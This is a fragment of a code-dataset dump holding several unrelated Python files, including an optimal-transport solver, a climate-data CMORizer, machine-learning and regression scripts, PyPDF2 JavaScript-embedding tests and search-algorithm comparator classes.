PMLR.\n\n \"\"\"\n\n # detect backend\n arr = [M]\n if a is not None:\n arr.append(a)\n if b is not None:\n arr.append(b)\n nx = get_backend(*arr)\n\n # create uniform weights if not given\n if a is None:\n a = nx.ones(M.shape[0], type_as=M) / M.shape[0]\n if b is None:\n b = nx.ones(M.shape[1], type_as=M) / M.shape[1]\n\n # default values for solutions\n potentials = None\n value = None\n value_linear = None\n plan = None\n status = None\n\n if reg is None or reg == 0: # exact OT\n\n if unbalanced is None: # Exact balanced OT\n\n # default values for EMD solver\n if max_iter is None:\n max_iter = 1000000\n\n value_linear, log = emd2(a, b, M, numItermax=max_iter, log=True, return_matrix=True, numThreads=n_threads)\n\n value = value_linear\n potentials = (log['u'], log['v'])\n plan = log['G']\n status = log[\"warning\"] if log[\"warning\"] is not None else 'Converged'\n\n elif unbalanced_type.lower() in ['kl', 'l2']: # unbalanced exact OT\n\n # default values for exact unbalanced OT\n if max_iter is None:\n max_iter = 1000\n if tol is None:\n tol = 1e-12\n\n plan, log = mm_unbalanced(a, b, M, reg_m=unbalanced,\n div=unbalanced_type.lower(), numItermax=max_iter,\n stopThr=tol, log=True,\n verbose=verbose, G0=plan_init)\n\n value_linear = log['cost']\n\n if unbalanced_type.lower() == 'kl':\n value = value_linear + unbalanced * (nx.kl_div(nx.sum(plan, 1), a) + nx.kl_div(nx.sum(plan, 0), b))\n else:\n err_a = nx.sum(plan, 1) - a\n err_b = nx.sum(plan, 0) - b\n value = value_linear + unbalanced * nx.sum(err_a**2) + unbalanced * nx.sum(err_b**2)\n\n elif unbalanced_type.lower() == 'tv':\n\n if max_iter is None:\n max_iter = 1000000\n\n plan, log = partial_wasserstein_lagrange(a, b, M, reg_m=unbalanced**2, log=True, numItermax=max_iter)\n\n value_linear = nx.sum(M * plan)\n err_a = nx.sum(plan, 1) - a\n err_b = nx.sum(plan, 0) - b\n value = value_linear + nx.sqrt(unbalanced**2 / 2.0 * (nx.sum(nx.abs(err_a)) +\n nx.sum(nx.abs(err_b))))\n\n else:\n raise (NotImplementedError('Unknown unbalanced_type=\"{}\"'.format(unbalanced_type)))\n\n else: # regularized OT\n\n if unbalanced is None: # Balanced regularized OT\n\n if reg_type.lower() in ['entropy', 'kl']:\n\n # default values for sinkhorn\n if max_iter is None:\n max_iter = 1000\n if tol is None:\n tol = 1e-9\n\n plan, log = sinkhorn_log(a, b, M, reg=reg, numItermax=max_iter,\n stopThr=tol, log=True,\n verbose=verbose)\n\n value_linear = nx.sum(M * plan)\n\n if reg_type.lower() == 'entropy':\n value = value_linear + reg * nx.sum(plan * nx.log(plan + 1e-16))\n else:\n value = value_linear + reg * nx.kl_div(plan, a[:, None] * b[None, :])\n\n potentials = (log['log_u'], log['log_v'])\n\n elif reg_type.lower() == 'l2':\n\n if max_iter is None:\n max_iter = 1000\n if tol is None:\n tol = 1e-9\n\n plan, log = smooth_ot_dual(a, b, M, reg=reg, numItermax=max_iter, stopThr=tol, log=True, verbose=verbose)\n\n value_linear = nx.sum(M * plan)\n value = value_linear + reg * nx.sum(plan**2)\n potentials = (log['alpha'], log['beta'])\n\n else:\n raise (NotImplementedError('Not implemented reg_type=\"{}\"'.format(reg_type)))\n\n else: # unbalanced AND regularized OT\n\n if reg_type.lower() in ['kl'] and unbalanced_type.lower() == 'kl':\n\n if max_iter is None:\n max_iter = 1000\n if tol is None:\n tol = 1e-9\n\n plan, log = sinkhorn_knopp_unbalanced(a, b, M, reg=reg, reg_m=unbalanced, numItermax=max_iter, stopThr=tol, verbose=verbose, log=True)\n\n value_linear = nx.sum(M * plan)\n\n value = value_linear + reg * nx.kl_div(plan, a[:, None] * b[None, :]) + 
unbalanced * (nx.kl_div(nx.sum(plan, 1), a) + nx.kl_div(nx.sum(plan, 0), b))\n\n potentials = (log['logu'], log['logv'])\n\n elif reg_type.lower() in ['kl', 'l2', 'entropy'] and unbalanced_type.lower() in ['kl', 'l2']:\n\n if max_iter is None:\n max_iter = 1000\n if tol is None:\n tol = 1e-12\n\n plan, log = lbfgsb_unbalanced(a, b, M, reg=reg, reg_m=unbalanced, reg_div=reg_type.lower(), regm_div=unbalanced_type.lower(), numItermax=max_iter, stopThr=tol, verbose=verbose, log=True)\n\n value_linear = nx.sum(M * plan)\n\n value = log['loss']\n\n else:\n raise (NotImplementedError('Not implemented reg_type=\"{}\" and unbalanced_type=\"{}\"'.format(reg_type, unbalanced_type)))\n\n res = OTResult(potentials=potentials, value=value,\n value_linear=value_linear, plan=plan, status=status, backend=nx)\n\n return res\n","sub_path":"ot/solvers.py","file_name":"solvers.py","file_ext":"py","file_size_in_byte":12718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"57474579","text":"from pecan import make_app\nfrom pecan.hooks import TransactionHook\nfrom urlwatch_api import model\n\n\ndef setup_app(config):\n\n model.init_model()\n app_conf = dict(config.app)\n\n return make_app(\n app_conf.pop('root'),\n logging=getattr(config, 'logging', {}),\n hooks = [\n TransactionHook(\n model.start,\n model.start,\n model.commit,\n model.rollback,\n model.clear\n )\n ],\n **app_conf\n )\n","sub_path":"urlwatch_api/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"605813749","text":"count = dict()\n\n\nname = input(\"Enter file:\")\nhandle = open(name)\n\nif len(name) < 1: name = \"mbox-short.txt\"\nfor i in handle:\n if not i.startswith('From '):\n continue\n afterslice = i.split()[5]\n line=afterslice[0:2]\n count[line] = count.get(line,0)+1\n \nlst=list() \nfor (value,count) in sorted(count.items()):\n lst.append((value,count))\n print(value, count)\n\n# lst.sort()\n# for value,count in lst:\n# print (value,count)\n\n","sub_path":"dictonary - Copy.py","file_name":"dictonary - Copy.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"107886504","text":"\"\"\"ESMValTool CMORizer for cds-satellite-lai-fapar data.\n\nTier\n Tier 3\nSource\n https://cds.climate.copernicus.eu/cdsapp#!/dataset/satellite-lai-fapar?tab=form\nLast access\n 20190703\n\nDownload and processing instructions\n - Open in a browser the data source as specified above\n - Put the right ticks:\n - Tick variables LAI and FAPAR\n - Tick satellite SPOT (System Pour l'Observation de la Terre)\n - Tick sensor VGT (Vegetation)\n - Tick horizontal resolution 1km\n - Tick product version V1\n - Tick all available years\n - Tick all available months\n - Tick Nominal day 20\n - Click 'submit form'\n - According to ESMValTool practice, put them in the right rawobsdir folder\n\nNotes\n-----\n - This script regrids and cmorizes the above dataset.\n - Request might need to be split into chunks to not exceed download limit\n\nCaveats\n - Fails setting standard name for variable FAPAR\n\nModification history\n 20200512-crezee_bas: adapted to reflect changes in download form by CDS.\n 20190703-crezee_bas: written.\n\"\"\"\n\nimport glob\nimport logging\nimport os\nfrom copy import deepcopy\nfrom datetime import datetime\nfrom warnings import catch_warnings, filterwarnings\n\nimport 
cf_units\nimport iris\nfrom esmvalcore.preprocessor import regrid\nfrom iris import NameConstraint\n\nfrom esmvaltool.cmorizers.data import utilities as utils\n\nlogger = logging.getLogger(__name__)\n\n\ndef _attrs_are_the_same(cubelist):\n # assume they are the same\n attrs_the_same = True\n allattrs = cubelist[0].attributes\n for key in allattrs:\n try:\n unique_attr_vals = {cube.attributes[key] for cube in cubelist}\n # This exception is needed for valid_range, which is an\n # array and therefore not hashable\n except TypeError:\n unique_attr_vals = {\n tuple(cube.attributes[key])\n for cube in cubelist\n }\n if len(unique_attr_vals) > 1:\n attrs_the_same = False\n print(f\"Different values found for {key}-attribute: \"\n f\"{unique_attr_vals}\")\n return attrs_the_same\n\n\ndef _cmorize_dataset(in_file, var, cfg, out_dir):\n logger.info(\"CMORizing variable '%s' from input file '%s'\",\n var['short_name'], in_file)\n attributes = deepcopy(cfg['attributes'])\n attributes['mip'] = var['mip']\n\n cmor_table = cfg['cmor_table']\n definition = cmor_table.get_variable(var['mip'], var['short_name'])\n\n cube = iris.load_cube(str(in_file),\n constraint=NameConstraint(var_name=var['raw']))\n\n # Set correct names\n cube.var_name = definition.short_name\n if definition.standard_name:\n cube.standard_name = definition.standard_name\n\n cube.long_name = definition.long_name\n\n # Convert units if required\n cube.convert_units(definition.units)\n\n # Set global attributes\n utils.set_global_atts(cube, attributes)\n\n logger.info(\"Saving CMORized cube for variable %s\", cube.var_name)\n utils.save_variable(cube, cube.var_name, out_dir, attributes)\n\n return in_file\n\n\ndef _regrid_dataset(in_dir, var, cfg):\n \"\"\"Regridding of original files.\n\n This function regrids each file and write to disk appending 'regrid'\n in front of filename.\n \"\"\"\n filelist = glob.glob(os.path.join(in_dir, var['file']))\n for infile in filelist:\n _, infile_tail = os.path.split(infile)\n outfile_tail = infile_tail.replace('c3s', 'c3s_regridded')\n outfile = os.path.join(cfg['work_dir'], outfile_tail)\n with catch_warnings():\n filterwarnings(\n action='ignore',\n # Full message:\n # UserWarning: Skipping global attribute 'long_name':\n # 'long_name' is not a permitted attribute\n message=\"Skipping global attribute 'long_name'\",\n category=UserWarning,\n module='iris',\n )\n lai_cube = iris.load_cube(infile,\n constraint=NameConstraint(\n var_name=var['raw']))\n lai_cube = regrid(lai_cube, cfg['custom']['regrid_resolution'],\n 'nearest')\n logger.info(\"Saving: %s\", outfile)\n\n iris.save(lai_cube, outfile)\n\n\ndef _set_time_bnds(in_dir, var):\n \"\"\"Set time_bnds by using attribute and returns a cubelist.\"\"\"\n # This is a complicated expression, but necessary to keep local\n # variables below the limit, otherwise prospector complains.\n cubelist = iris.load(\n glob.glob(\n os.path.join(in_dir, var['file'].replace('c3s', 'c3s_regridded'))))\n\n # The purpose of the following loop is to remove any attributes\n # that differ between cubes (otherwise concatenation over time fails).\n # In addition, care is taken of the time coordinate, by adding the\n # time_coverage attributes as time_bnds to the time coordinate.\n for n_cube, _ in enumerate(cubelist):\n time_coverage_start = cubelist[n_cube].\\\n attributes.pop('time_coverage_start')\n time_coverage_end = cubelist[n_cube].\\\n attributes.pop('time_coverage_end')\n\n # Now put time_coverage_start/end as time_bnds\n # Convert time_coverage_xxxx to 
datetime\n bnd_a = datetime.strptime(time_coverage_start, \"%Y-%m-%dT%H:%M:%SZ\")\n bnd_b = datetime.strptime(time_coverage_end, \"%Y-%m-%dT%H:%M:%SZ\")\n\n # Put in shape for time_bnds\n time_bnds_datetime = [bnd_a, bnd_b]\n\n # Read dataset time unit and calendar from file\n dataset_time_unit = str(cubelist[n_cube].coord('time').units)\n dataset_time_calender = cubelist[n_cube].coord('time').units.calendar\n # Convert datetime\n time_bnds = cf_units.date2num(time_bnds_datetime, dataset_time_unit,\n dataset_time_calender)\n # Put them on the file\n cubelist[n_cube].coord('time').bounds = time_bnds\n\n return cubelist\n\n\ndef cmorization(in_dir, out_dir, cfg, cfg_user, start_date, end_date):\n \"\"\"Cmorization func call.\"\"\"\n # run the cmorization\n # Pass on the workdir to the cfg dictionary\n cfg['work_dir'] = cfg_user.work_dir\n # If it doesn't exist, create it\n if not os.path.isdir(cfg['work_dir']):\n logger.info(\"Creating working directory for regridding: %s\",\n cfg['work_dir'])\n os.mkdir(cfg['work_dir'])\n\n for short_name, var in cfg['variables'].items():\n var['short_name'] = short_name\n logger.info(\"Processing var %s\", short_name)\n\n # Regridding\n logger.info(\"Start regridding to: %s\",\n cfg['custom']['regrid_resolution'])\n _regrid_dataset(in_dir, var, cfg)\n logger.info(\"Finished regridding\")\n\n # File concatenation\n logger.info(\"Start setting time_bnds\")\n cubelist = _set_time_bnds(cfg['work_dir'], var)\n\n # Loop over two different platform names\n for platformname in ['SPOT-4', 'SPOT-5']:\n # Now split the cubelist on the different platform\n logger.info(\"Start processing part of dataset: %s\", platformname)\n cubelist_platform = cubelist.extract(\n iris.AttributeConstraint(platform=platformname))\n for n_cube, _ in enumerate(cubelist_platform):\n cubelist_platform[n_cube].attributes.pop('identifier')\n if cubelist_platform:\n assert _attrs_are_the_same(cubelist_platform)\n cube = cubelist_platform.concatenate_cube()\n else:\n logger.warning(\n \"No files found for platform %s \\\n (check input data)\", platformname)\n continue\n savename = os.path.join(cfg['work_dir'],\n var['short_name'] + platformname + '.nc')\n logger.info(\"Saving as: %s\", savename)\n iris.save(cube, savename)\n logger.info(\"Finished file concatenation over time\")\n logger.info(\"Start CMORization of file %s\", savename)\n _cmorize_dataset(savename, var, cfg, out_dir)\n logger.info(\"Finished regridding and CMORizing %s\", savename)\n","sub_path":"esmvaltool/cmorizers/data/formatters/datasets/cds_satellite_lai_fapar.py","file_name":"cds_satellite_lai_fapar.py","file_ext":"py","file_size_in_byte":8262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"104617624","text":"# -*- coding: utf-8 -*-\n#from __future__ import print_function\n\nimport numpy as np\nimport tflearn\nimport sys\nimport re\nimport tensorflow as tf\nimport os\nimport matplotlib.pyplot as plt\n\n# Input data\nfilename = '/home/c/桌面/data21.txt'\ntest_filename = '/home/c/桌面/data22.txt'\nduty = []\npos = []\npos_test = []\nduty_test = []\nduty_test1 = []\nduty_test2 = []\nposition1 = []\nposition2 = []\npre_duty_test1 = []\npre_duty_test2 = []\nm = 0\nflag1 = []\nflag2 = []\n\ntext = open(filename, \"r\")\ntrainlines = text.read().splitlines()\nfor line in trainlines: \n line = re.findall(r'-?\\d+\\.?\\d*e?-?\\d*?', line) # extract negative/decimal/integer numbers from the string\n m += 1 \n pos.append([float(line[8]),float(line[9]),float(line[10])])\n 
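# NOTE (inferred from this script, not from any external doc): each sample carries two\n # duty labels; the first stays in classes 0-255 and the second is shifted by +256 into\n # classes 256-511, so both can share the single 512-way categorical encoding built below.\n 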
duty.append([float(line[0]),float(line[1])+256])\nduty = np.array(duty, dtype=np.float32)\npos = np.array(pos, dtype=np.float32)\nduty = tflearn.data_utils.to_categorical(duty, 512)\nfor x in range(m):\n duty[x,:] = duty[x,:] + duty[x+1,:]\n duty = np.delete(duty, x+1, axis=0)\n print(x)\n\nimport h5py\nh5f = h5py.File('data.h5', 'w')\nh5f.create_dataset('duty', data=duty)\nh5f.create_dataset('pos', data=pos)\nh5f.close()\n\n# Load hdf5 dataset\nh5f = h5py.File('data.h5', 'r')\nduty = h5f['duty']\npos = h5f['pos']\n\ntest_text = open(test_filename, \"r\")\ntextlines = test_text.read().splitlines()\nfor line in textlines:\n line = re.findall(r'-?\\d+\\.?\\d*e?-?\\d*?', line) # extract negative/decimal/integer numbers from the string\n pos_test.append([float(line[8]),float(line[9]),float(line[10])])\n duty_test.append([float(line[0]),float(line[1])+256])\n duty_test1.append([float(line[0])])\n duty_test2.append([float(line[1])])\npos_test = np.array(pos_test, dtype=np.float32)\nduty_test = np.array(duty_test, dtype=np.float32)\nduty_test1 = np.array(duty_test1, dtype=np.float32)\nduty_test2 = np.array(duty_test2, dtype=np.float32)\n\n#Build neural network\nnet = tflearn.input_data(shape=[None, 3]) \nnet = tflearn.fully_connected(net, 1024, activation='relu')\nnet = tflearn.fully_connected(net, 1024, activation='relu')\nnet = tflearn.fully_connected(net, 1024, activation='relu')\nnet = tflearn.fully_connected(net, 1024, activation='relu')\nnet = tflearn.fully_connected(net, 512, activation='softmax')\nnet = tflearn.regression(net, loss='mean_square')\n\n# Define model\nmodel = tflearn.DNN(net)\n#model_file = os.path.join(\"/home/savage/Desktop\", \"my_dnn\")\n#model.load(model_file)\n\n# Start training (apply gradient descent algorithm)\nmodel.fit(pos, duty, n_epoch=2000, batch_size=128, show_metric=True, validation_set=0.2)\n\nmodel.save('dnn')\n\n# draw pics\nfig = plt.figure()\nax = fig.add_subplot(1,1,1)\nax.plot(range(20),duty_test1[0:20],'b') # plot the first 20 data points\nax.set_ylim([0,255])\nplt.ion()\nplt.show()\n\nh5f.close()\n\n# Predict probable output\npred = model.predict_label(pos_test)\npred = np.array(pred, dtype=np.float32)\nprint(pred)\nposition1 = np.argmax(pred, axis=1)\nprint(position1)\nposition1 = np.array(position1, dtype=np.float32)\ncolumn = position1.shape[0]\nfor i in range(column):\n if (float(position1[i]) > 255):\n pre_duty_test2.append([float(position1[i])-256])\n flag2.append(1)\n flag1.append(0) \n else:\n pre_duty_test1.append([float(position1[i])]) \n flag1.append(1) \n flag2.append(0)\n pred[i, int(position1[i])] = 0\n \n position2 = np.argmax(pred, axis=1)\n print(position2)\n if (float(position2[i]) > 255):\n if (float(flag2[i]) == 0):\n pre_duty_test2.append([float(position2[i])-256]) \n elif (float(flag2[i]) == 1):\n pre_duty_test1.append([0])\n pre_duty_test2[i] = 0\n else:\n if (float(flag1[i]) == 0):\n pre_duty_test1.append([float(position2[i])]) \n elif (float(flag1[i]) == 1):\n pre_duty_test2.append([0])\n pre_duty_test1[i] = 0\n\ntry:\n ax.lines.remove(lines[0])\nexcept:\n pass\nprint(pre_duty_test1)\nlines = ax.plot(range(20), pre_duty_test1[0:20], 'r--')\ninput()\n\nprint(\"finished!\")\n","sub_path":"cjs-dnn.py","file_name":"cjs-dnn.py","file_ext":"py","file_size_in_byte":3984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"540859662","text":"# Polynomial Regression\n\n# Importing the libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n# Importing the dataset\n
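# (Assumption, for readability: Position_Salaries.csv holds columns Position, Level, Salary,\n# with Level at column index 1 and Salary at index 2, matching the iloc calls below.)\n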
dataset = pd.read_csv('Position_Salaries.csv')\nX = dataset.iloc[:, 1:2].values #Here we could have just used column=1\n #but that creates an array/vector of integer numbers\n #whereas ML models always require independent variables \n #to be in the form of matrix\ny = dataset.iloc[:, 2].values\n\n# Splitting the dataset into the Training set and Test set\n\"\"\"\nSince the dataset is very small, it is not divided into training and test set.\nPrediction has to be accurate and therefore all the data points are used for building \nthe model.\nThough from the plot it is evident that polynomial regression will suit best\nStill we'll use Linear and Polynomial regression both to build and fit the model\nand compare the results obtained from both.\n\"\"\"\n#Fitting Linear regression to dataset\nfrom sklearn.linear_model import LinearRegression\nlin_reg = LinearRegression()\nlin_reg.fit(X,y)\n\n#Fitting polynomial regression to dataset\nfrom sklearn.preprocessing import PolynomialFeatures\n\n#it can be seen that as we increase the degree of polynomial features\n#the polynomial regression model fits much better\npoly_reg = PolynomialFeatures(degree = 4)\n#X_poly is used to create a matrix of polynomial features(Xo,X^1,X^2)\nX_poly = poly_reg.fit_transform(X)\nlin_reg_2 = LinearRegression()\nlin_reg_2.fit(X_poly,y)\n\n#Visualizing the linear regression results\nplt.scatter(X,y,color = 'red')\nplt.plot(X, lin_reg.predict(X),color = 'blue')\nplt.title('Salary vs Position Level')\nplt.xlabel('Position Level')\nplt.ylabel('Salary')\n\n#Visualizing the polynomial regression results\nplt.scatter(X,y,color = 'green')\nplt.plot(X, lin_reg_2.predict(X_poly),color = 'blue')\nplt.title('Salary vs Position Level')\nplt.xlabel('Position Level')\nplt.ylabel('Salary') \n\n# for a better model, we can decrease the step size between x\nX_grid = np.arange(min(X),max(X),0.1)\nX_grid = X_grid.reshape(len(X_grid),1)\nplt.scatter(X,y,color = 'green')\nplt.plot(X_grid, lin_reg_2.predict(poly_reg.fit_transform(X_grid)),color = 'blue')\nplt.title('Salary vs Position Level')\nplt.xlabel('Position Level')\nplt.ylabel('Salary')\n\n#Predict salaries using linear regression\nlin_reg.predict([[6.5]])\n\n#Predict salaries using polynomial regression\nlin_reg_2.predict(poly_reg.fit_transform([[6.5]]))\n\n\n\n","sub_path":"Part 2 - Regression/Section 6 - Polynomial Regression/polynomial_regression.py","file_name":"polynomial_regression.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"346934947","text":"import pandas as pd\nimport numpy as np\nimport ally\nimport yfinance as yf\nfrom termcolor import colored\nfrom gamestonk_terminal.portfolio.brokers.brokers_helpers import ally_positions_to_df\n\n# pylint: disable=no-member\n\n\ndef login():\n try:\n ally.Ally()\n except Exception as e:\n print(e)\n print(\"\")\n\n\ndef show_holdings():\n\n a = ally.Ally()\n hold = a.holdings()\n stonks = list(hold.sym)\n last_prices = np.asarray(list(hold.lastprice.astype(float))).round(2)\n equity = list(round(hold.marketvalue.astype(float), 2))\n # Loop to get previous close (ally api does not provide that)\n tickers = yf.Tickers(\" \".join(stonks))\n prev_closes = np.array([t.info[\"previousClose\"] for t in tickers.tickers])\n pct_changes = ((last_prices - prev_closes) / prev_closes).round(3)\n\n print(\"Stonk\\t last price \\t prev close \\t equity \\t % Change\")\n\n for stonk, last_price, prev_close, eq, pct_change in zip(\n stonks, last_prices, prev_closes, equity, 
pct_changes\n ):\n\n to_print = f\"{stonk}\\t {last_price}\\t\\t {prev_close}\\t\\t {eq}\\t\\t {pct_change}\"\n if last_price >= prev_close:\n print(colored(to_print, \"green\"))\n else:\n print(colored(to_print, \"red\"))\n\n print(\"\")\n\n\ndef return_holdings() -> pd.DataFrame:\n a = ally.Ally()\n hold = a.holdings()\n return ally_positions_to_df(hold)\n","sub_path":"gamestonk_terminal/portfolio/brokers/ally_api.py","file_name":"ally_api.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"118167380","text":"import os\n\nimport pytest\n\nfrom PyPDF2 import PdfFileReader, PdfFileWriter\n\n# Configure path environment\nTESTS_ROOT = os.path.abspath(os.path.dirname(__file__))\nPROJECT_ROOT = os.path.dirname(TESTS_ROOT)\nRESOURCE_ROOT = os.path.join(PROJECT_ROOT, \"Resources\")\n\n\n@pytest.fixture()\ndef pdf_file_writer():\n reader = PdfFileReader(os.path.join(RESOURCE_ROOT, \"crazyones.pdf\"))\n writer = PdfFileWriter()\n writer.appendPagesFromReader(reader)\n yield writer\n\n\ndef test_add_js(pdf_file_writer):\n pdf_file_writer.addJS(\"this.print({bUI:true,bSilent:false,bShrinkToFit:true});\")\n\n assert (\n \"/Names\" in pdf_file_writer._root_object\n ), \"addJS should add a name catalog in the root object.\"\n assert (\n \"/JavaScript\" in pdf_file_writer._root_object[\"/Names\"]\n ), \"addJS should add a JavaScript name tree under the name catalog.\"\n assert (\n \"/OpenAction\" in pdf_file_writer._root_object\n ), \"addJS should add an OpenAction to the catalog.\"\n\n\ndef test_overwrite_js(pdf_file_writer):\n def get_javascript_name():\n assert \"/Names\" in pdf_file_writer._root_object\n assert \"/JavaScript\" in pdf_file_writer._root_object[\"/Names\"]\n assert \"/Names\" in pdf_file_writer._root_object[\"/Names\"][\"/JavaScript\"]\n return pdf_file_writer._root_object[\"/Names\"][\"/JavaScript\"][\"/Names\"][0]\n\n pdf_file_writer.addJS(\"this.print({bUI:true,bSilent:false,bShrinkToFit:true});\")\n first_js = get_javascript_name()\n\n pdf_file_writer.addJS(\"this.print({bUI:true,bSilent:false,bShrinkToFit:true});\")\n second_js = get_javascript_name()\n\n assert (\n first_js != second_js\n ), \"addJS should overwrite the previous script in the catalog.\"\n","sub_path":"Tests/test_javascript.py","file_name":"test_javascript.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"356133366","text":"from quantum_systems.quantum_dots.two_dim.two_dim_interface import (\n get_coulomb_element,\n get_indices_nm,\n get_coulomb_elements,\n)\nfrom quantum_systems.quantum_dots.two_dim.coulomb_elements import new_coulomb_ho\nfrom quantum_systems.quantum_dots.two_dim.two_dim_helper import (\n new_get_coulomb_elements,\n)\n\nimport time\nimport numpy as np\n\n\ndef fetch_elements(l, foo):\n t0 = time.time()\n for p in range(l):\n n_p, m_p = get_indices_nm(p)\n for q in range(l):\n n_q, m_q = get_indices_nm(q)\n for r in range(l):\n n_r, m_r = get_indices_nm(r)\n for s in range(l):\n n_s, m_s = get_indices_nm(s)\n\n args = [n_p, m_p, n_q, m_q, n_r, m_r, n_s, m_s]\n foo(*args)\n\n t1 = time.time()\n print(\"Time spent running {0}: {1} sec\".format(foo.__name__, t1 - t0))\n\n\ndef fetch_all_elements(l, foo):\n t0 = time.time()\n oi = foo(l)\n t1 = time.time()\n\n print(\"Time spent running {0}: {1} sec\".format(foo.__name__, t1 - t0))\n\n return oi\n\n\nl = 20\nfor i in range(10):\n fetch_elements(l, 
get_coulomb_element)\nfor i in range(10):\n fetch_elements(l, new_coulomb_ho)\n\n\noi_c = fetch_all_elements(l // 2, get_coulomb_elements)\noi_n = np.complex128(fetch_all_elements(l // 2, new_get_coulomb_elements))\n\nnp.testing.assert_allclose(oi_c, oi_n)\n","sub_path":"scripts/compare_time.py","file_name":"compare_time.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"537143850","text":"# Store Vowels in a List and Check if the passed string contains any of the vowel stored\nvowels = [\"a\", \"e\", \"i\", \"o\", \"u\"]\n\n\ndef is_it_vowel(string):\n message = \"not vowel\"\n for x in vowels:\n if string == x:\n message = \"vowel\"\n return message\n\n\nprint(is_it_vowel(\"a\"))\nprint(is_it_vowel(\"b\"))\n","sub_path":"neoOkpara/Phase-1/Day4/find_vowel.py","file_name":"find_vowel.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"91017943","text":"n = int(input())\nx = [int(i) for i in input().split()]\ndata = dict()\nfor i in range(0,n):\n if not (x[i] in data):\n data[x[i]]=[1,i]\n else:\n data[x[i]] = [data[x[i]][0]+1, i]\nt = list(data.items());\nt.sort(key=lambda x: (-x[1][0], x[1][1]))\nprint(t[0][0])","sub_path":"vk1.py","file_name":"vk1.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"503290853","text":"from typing import Union\nimport numpy as np\nimport librosa\nimport matplotlib.pyplot as plt\nimport itertools\n\n\ndef plot_confusion_matrix(cm, classes, normalize=False, title='Confusion matrix', cmap=plt.cm.Blues):\n plt.figure(figsize=(10,10))\n plt.imshow(cm, cmap=cmap)\n plt.title(title)\n plt.colorbar()\n \n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=0)\n plt.yticks(tick_marks, classes)\n \n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, format(cm[i, j], fmt), horizontalalignment=\"center\", color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n \n \ndef predict_models(models, x):\n predictions = []\n for k, model in models.items():\n _, pred = model(x)\n predictions.append(pred.argmax(dim=1).detach().numpy()[0])\n return np.bincount(np.array(predictions)).argmax()","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"535831464","text":"\"\"\"\nFIT3080 Assignment 1: Problem Solving as Search\n\nBy:\n- David Lei, student id: 26029391 , tutorial class: Thursday 11am\n- Haoyu Shi, student id: 25741535, tutorial class: Wednesday 2pm\n\"\"\"\n# -------------------------------------------------- Classes ------------------------------------------------------- #\n\nclass A_Comparator:\n \"\"\" Class that allows A/A* nodes to be compared based on their f(n) estimate, with tie breakers of operation preference and node id \"\"\"\n def __init__(self, fn, op, id):\n self.id = id\n self.estimate_Fn = fn\n self.operation = op\n\n def __lt__(self, other):\n if self.estimate_Fn < other.estimate_Fn:\n return True\n elif self.estimate_Fn > other.estimate_Fn:\n return False\n elif self.estimate_Fn == other.estimate_Fn:\n if self._get_op_value(self.operation) < 
self._get_op_value(other.operation):\n return True\n elif self._get_op_value(self.operation) > self._get_op_value(other.operation):\n return False\n else:\n \"\"\" Comparing by id, bigger id means created first, so expand first, so return smaller \"\"\"\n if self.id > other.id:\n return True\n elif self.id < other.id:\n return False\n else:\n return ValueError\n else:\n raise ValueError\n\n def __gt__(self, other):\n if self.estimate_Fn > other.estimate_Fn:\n return True\n elif self.estimate_Fn < other.estimate_Fn:\n return False\n elif self.estimate_Fn == other.estimate_Fn:\n if self._get_op_value(self.operation) > self._get_op_value(other.operation):\n return True\n elif self._get_op_value(self.operation) < self._get_op_value(other.operation):\n return False\n else:\n \"\"\" Comparing by id, bigger id means created first, so expand first, so return smaller \"\"\"\n if self.id > other.id:\n return False\n elif self.id < other.id:\n return True\n else:\n return ValueError\n else:\n raise ValueError\n\n def _get_op_value(self, op):\n \"\"\" the better the operation the lower the score as we pick the lowest fn node for A* \"\"\"\n d = { \"2L\":1, \"2R\":2,\n \"1L\":3, \"1R\":4,\n \"3L\":5, \"3R\":6 }\n return d[op]\n\nclass DLS_Comparator:\n \"\"\" Class that allows DLS nodes to be compared based on depth with tie breaker the preference of operations \"\"\"\n def __init__(self, d, op):\n self.depth = d\n self.operation = op\n \n def __lt__(self, other):\n if self.depth < other.depth:\n return True\n elif self.depth > other.depth:\n return False\n elif self.depth == other.depth:\n if self._get_op_value(self.operation) < self._get_op_value(other.operation):\n return True\n elif self._get_op_value(self.operation) > self._get_op_value(other.operation):\n return False\n else: \n raise ValueError\n else:\n raise ValueError\n \n def __gt__(self, other):\n if self.depth > other.depth:\n return True\n elif self.depth < other.depth:\n return False\n elif self.depth == other.depth:\n if self._get_op_value(self.operation) > self._get_op_value(other.operation):\n return True\n elif self._get_op_value(self.operation) < self._get_op_value(other.operation):\n return False\n else: \n raise ValueError\n else:\n raise ValueError\n \n def _get_op_value(self, op):\n \"\"\" The better the operation the higher the score as we pick the 